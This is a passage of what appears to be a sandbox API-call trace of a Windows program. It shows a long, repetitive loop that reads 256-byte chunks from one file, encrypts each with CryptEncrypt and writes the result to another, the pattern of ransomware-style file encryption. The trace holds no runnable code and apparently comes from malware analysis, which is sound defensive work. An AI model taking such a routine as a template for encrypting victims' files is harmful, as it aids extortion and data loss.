lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.187] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.187] GetLastError () returned 0x0 [0168.187] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.187] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.187] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.188] GetLastError () returned 0x0 [0168.188] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.188] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.188] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.188] GetLastError () returned 0x0 [0168.188] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.188] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.188] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.188] GetLastError () returned 0x0 [0168.188] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.188] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.188] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.188] GetLastError () returned 0x0 [0168.188] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.188] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.188] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.188] GetLastError () returned 0x0 [0168.188] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.188] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.188] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.188] GetLastError () returned 0x0 [0168.188] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.188] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.188] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.188] GetLastError () returned 0x0 [0168.188] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.188] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.189] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.189] GetLastError () returned 0x0 [0168.189] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.189] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.189] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.189] GetLastError () returned 0x0 [0168.189] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.189] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.189] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.189] GetLastError () returned 0x0 [0168.189] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.189] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.189] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.189] GetLastError () returned 0x0 [0168.189] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.189] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.189] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.189] GetLastError () returned 0x0 [0168.189] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.189] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.189] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.189] GetLastError () returned 0x0 [0168.189] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.189] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.189] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.189] GetLastError () returned 0x0 [0168.190] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.190] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.190] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.190] GetLastError () returned 0x0 [0168.190] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.190] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.190] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.190] GetLastError () returned 0x0 [0168.190] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.190] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.190] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.190] GetLastError () returned 0x0 [0168.190] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.190] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.190] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.190] GetLastError () returned 0x0 [0168.190] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.190] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.190] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.190] GetLastError () returned 0x0 [0168.190] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.190] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.190] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.190] GetLastError () returned 0x0 [0168.190] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.190] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.191] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.191] GetLastError () returned 0x0 [0168.191] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.191] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.191] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.191] GetLastError () returned 0x0 [0168.191] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.191] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.191] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.191] GetLastError () returned 0x0 [0168.191] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.191] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.191] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.191] GetLastError () returned 0x0 [0168.191] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.191] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.191] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.191] GetLastError () returned 0x0 [0168.191] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.191] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.191] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.191] GetLastError () returned 0x0 [0168.191] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.191] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.192] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.192] GetLastError () returned 0x0 [0168.192] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.192] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.192] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.192] GetLastError () returned 0x0 [0168.192] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.192] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.192] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.192] GetLastError () returned 0x0 [0168.192] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.192] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.192] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.192] GetLastError () returned 0x0 [0168.192] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.192] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.192] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.192] GetLastError () returned 0x0 [0168.192] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.192] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 